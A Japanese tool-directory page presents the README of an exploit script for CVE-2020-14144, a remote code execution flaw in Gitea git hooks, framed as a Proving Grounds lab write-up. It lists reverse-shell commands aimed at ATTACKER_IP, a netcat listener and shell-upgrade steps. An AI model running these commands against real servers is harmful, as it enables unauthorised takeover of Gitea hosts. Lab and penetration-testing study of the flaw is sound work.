Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Gitea-Git-Hooks-RCE-CVE-2020-14144- — Gitea バージョン 1.1.0 → 1.12.5 では、「May create git hooks」(Git フックを作成) 権限を持つ認証済みユーザーが、post-receive フックに任意のシェルコマンドを注入できます。コミットをプッシュするとフックがトリガーされ、サーバー上でペイロードが実行されます。 | Kitploit
ツール/GitHubGitHub/mohnad-al-saif/gitea-git-hooks-rce-cve-2020-14144-
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発
GitHubmohnad-al-saif/gitea-git-hooks-rce-cve-2020-14144-

Gitea-Git-Hooks-RCE-CVE-2020-14144-

Gitea バージョン 1.1.0 → 1.12.5 では、「May create git hooks」(Git フックを作成) 権限を持つ認証済みユーザーが、post-receive フックに任意のシェルコマンドを注入できます。コミットをプッシュするとフックがトリガーされ、サーバー上でペイロードが実行されます。

リポジトリを見る
16ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Gitea Gitフック RCE (CVE-2020-14144)

OffsecProvingGrounds Practice — Roquefort マシンの Writeup & POC

概要

項目詳細
マシンRoquefort (Proving Grounds Practice)
OSLinux
Gitea バージョン1.7.5
CVECVE-2020-14144
ベクターGitフック経由の認証済みRCE
ユーザーシェルchloe

Gitea バージョン 1.1.0 → 1.12.5 では、「May create git hooks」 権限を持つ認証済みユーザーが post-receive フックに任意のシェルコマンドを注入できます。コミットをプッシュするとフックが起動し、サーバー上でペイロードが実行されます。

クイックスタート

自動化(Python スクリプト)

root@kitploit:~
# Linux target — reverse shell
python3 exploit.py -t http://TARGET:3000 -u test -p password123 -I ATTACKER_IP -P 4444 --os linux

# Windows target — PowerShell reverse shell
python3 exploit.py -t http://TARGET:3000 -u test -p password123 -I ATTACKER_IP -P 4444 --os windows

手動

ステップバイステップの攻略ガイドは MANUAL.md を参照してください。

リポジトリ構成

root@kitploit:~
.
├── README.md          # This file
├── MANUAL.md          # Manual exploitation guide (Linux + Windows)
└── exploit.py         # Automated exploit script

必要条件

  • Python 3.6+
  • requests ライブラリ(pip install requests)
  • 攻撃マシンに git がインストールされていること
  • gitフック権限を持つ有効なGitea認証情報

使用方法

root@kitploit:~
usage: exploit.py [-h] -t TARGET -u USERNAME -p PASSWORD -I REV_IP -P REV_PORT
                  [--os {linux,windows}] [--repo REPO] [-f PAYLOAD_FILE] [-v]

Roquefort — Gitea Authenticated RCE via Git Hooks (CVE-2020-14144)

required arguments:
  -t, --target       Target Gitea URL (e.g. http://192.168.x.x:3000)
  -u, --username     Gitea username
  -p, --password     Gitea password
  -I, --rev-ip       Attacker listener IP
  -P, --rev-port     Attacker listener port

optional arguments:
  --os               Target OS: linux (default) or windows
  --repo             Repository name to create (default: exploit)
  -f, --payload-file Custom shell script payload file
  -v, --verbose      Verbose output

使用例

root@kitploit:~
# 1) Start listener
nc -lvnp 4444

# 2) Run exploit (Linux target)
python3 exploit.py -t http://192.168.103.67:3000 -u test -p password123 \
  -I 192.168.45.168 -P 4444

# 3) Run exploit (Windows target)
python3 exploit.py -t http://192.168.103.67:3000 -u test -p password123 \
  -I 192.168.45.168 -P 4444 --os windows

# 4) Custom payload file
python3 exploit.py -t http://192.168.103.67:3000 -u test -p password123 \
  -I 192.168.45.168 -P 4444 -f payload.sh

シェルのアップグレード(エクスプロイト後)

リバースシェルを取得した後:

root@kitploit:~
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# Ctrl+Z
stty raw -echo; fg

トラブルシューティング

問題解決策
fatal: dubious ownership共有フォルダの代わりに ~ からクローンするか、git config --global --add safe.directory '*' を実行する
接続が受信されない攻撃者のIPを確認し、ファイアウォールを確認し、両マシンが同じサブネット上にあることを確認する
フックは発火するがシェルが取得できないまず touch /tmp/pwned ペイロードでテストする — ファイルが作成されていれば、リバースシェルがブロックされている
フックで権限が拒否されるユーザーにフック権限がない — 管理者または「May create git hooks」権限が必要
3000番ポートの競合Gitea は3000番を使用する — リスナーには4444などの別のポートを使用する

参考リンク

  • CVE-2020-14144 — NVD
  • Gitea Issue #13058
  • p0dalirius Original POC

免責事項

このツールは、許可されたペネトレーションテストおよび教育目的のみを対象としています。コンピュータシステムへの不正アクセスは違法です。責任を持って使用してください。

ツールをダウンロード